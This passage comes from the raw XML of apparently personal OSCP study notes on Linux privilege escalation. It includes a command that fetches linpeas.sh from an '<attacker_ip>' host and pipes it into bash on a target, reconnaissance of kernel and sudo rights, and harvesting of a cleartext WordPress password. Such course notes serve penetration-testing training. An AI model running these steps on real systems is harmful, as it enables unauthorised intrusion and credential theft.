        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. From the target machine, on the reverse shell, curl your attacking machine to get the file and the run it immediately (that's why we are piping into bash)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://&lt;attacker_ip&gt;/linpeas.sh | bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. If you </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T WANT it to run immediately</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can save the linpeas.sh file into another file inside of the reverse shell so that we can run it later</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O linpeas.sh http://&lt;attacker_ip&gt;/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001500">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001501">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001503">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x ./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"a" means all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"x" means execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001506">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001507">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001508">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001509">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ddfof8uh6gxr" w:id="179"/>
      <w:bookmarkEnd w:id="179"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting important information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (27.2.2. A Link to the Past)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operative System:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001510">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="363" name="image355.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image355.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId407"/>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1511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "4.4.0-21-generic" is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001512">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(buildd@lgw01-06) → Name of the build machine (build daemon that compiled the kernel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2)) → GCC compiler version used, with build date.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">16.04 is the Ubuntu Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001515">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Xenial is the code name for 16.04</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001516">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001517">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaces (Network interfaces):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001518">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4129088" cy="2308186"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="272" name="image258.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image258.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId408"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4129088" cy="2308186"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001519">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 20 shows only one network interface apart from the loopback interface. This means that the target machine is not connected to the internal network, and we cannot use it as a pivot point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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t xml:space="preserve">sudo -l:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4862513" cy="1348100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="535" name="image516.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image516.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId409"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4862513" cy="1348100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="747"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 21 shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with sudo privileges without entering a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="747"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP 27.2.2. A Link to the Past</w:t>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t xml:space="preserve">Analyzing Wordpress Files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001521">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="539" name="image521.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image521.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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1522">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovering a clear-text password is always a potential high value finding. Let's save the password in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file on our Kali machine for future use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001523">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another interesting aspect of this finding is the path displayed starts with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The WordPress instance is not installed in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where web applications are commonly found on Debian-based Linux systems. While this is not an actionable result, we should keep it in mind for future steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001524">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP 27.2.2. A Link to the Past</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001525">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001526">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching Wordpress wp-config.php files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001527">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="952500"/>
